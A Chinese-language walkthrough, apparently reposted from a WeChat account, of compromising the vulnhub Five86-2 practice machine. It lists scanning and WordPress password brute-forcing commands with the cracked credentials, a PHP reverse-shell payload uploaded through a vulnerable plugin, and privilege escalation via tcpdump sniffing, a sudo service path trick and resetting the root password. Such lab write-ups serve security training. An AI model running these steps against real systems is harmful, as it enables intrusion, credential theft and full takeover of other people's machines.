今天实践的是vulnhub的Five86-2镜像,
下载地址,https://download.vulnhub.com/five86/Five86-2.zip,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.189,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.189,
获取到80端口有web服务,并且是WordPress,
用wpscan扫描用户,
wpscan --url http://192.168.0.189 --enumerate u,
获取到barney,admin,gillian,peter,stephen五个用户,
准备一个密码字典,
sudo gunzip /usr/share/wordlists/rockyou.txt.gz,
把上面五个用户名保存到文件,vim user.txt
barney
admin
gillian
peter
stephen
用wpscan做密码破解,
wpscan --url http://192.168.0.189 -U user.txt -P /usr/share/wordlists/rockyou.txt,
获取到barney/spooky1和stephen/apollo1两组用户名密码,
本地添加ip和主机名的静态解析,192.168.0.189 five86-2,
浏览器访问http://five86-2,
进一步访问到http://five86-2/wp-login.php,
用barney/spooky1登录,
发现Insert or Embed Articulate Content into WordPress插件,
搜索ExploitDB,获取到远程代码执行的漏洞利用方法,
本地准备文件,
index.html
<html>hello</html>
index.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.192/4444 0>&1'");
压缩成poc.zip,
浏览器点击,Create a new Post -> Add block -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
浏览器访问http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php,
获取到反弹shell,切到stephen账户,
su stephen,转成交互式shell,
python3 -c 'import pty;pty.spawn("/bin/bash")',
查找root权限的程序,getcap -r / 2>/dev/null,获取到tcpdump,
进入stephen目录,cd /home/stephen,
查看可以抓包的网卡,tcpdump -D,
对网卡vetha45ab7c进行抓包,
timeout 150 tcpdump -w cap.pcap -i vetha45ab7c,
查看抓包,tcpdump -r cap.pcap,
获取到用户名密码paul/esomepasswford,
切换到paul账户,
su paul,查看sudo权限,sudo -l,
获取到可以peter账户身份执行service程序,
获取到新的shell,sudo -u peter service ../../bin/sh,
再次查看sudo权限,sudo -l,
获取到可以root身份执行passwd程序,
修改root的密码,sudo passwd root,
切换到root账户,su root,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Five86-2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论